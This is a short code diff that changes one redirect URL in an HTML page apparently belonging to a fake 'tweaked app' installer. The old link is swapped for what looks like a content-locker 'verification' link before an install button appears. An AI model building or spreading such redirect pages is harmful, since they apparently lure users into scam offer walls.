--- a/itweakvip/OGInject/t3.html
+++ b/itweakvip/OGInject/t3.html
@@ -132,7 +132,7 @@
         id("app_name").innerHTML = name;
         id("app-caption-title").innerHTML = name;
 
-        window.lcr = "https://www.bigappboi.com/cl.php?id=fae472f6c464cf4f91fb2a5fca574a76";
+        window.lcr = "https://verifysuper.com/cl/i/klpd5q";
         id("install").style.display = "block";
     }
 
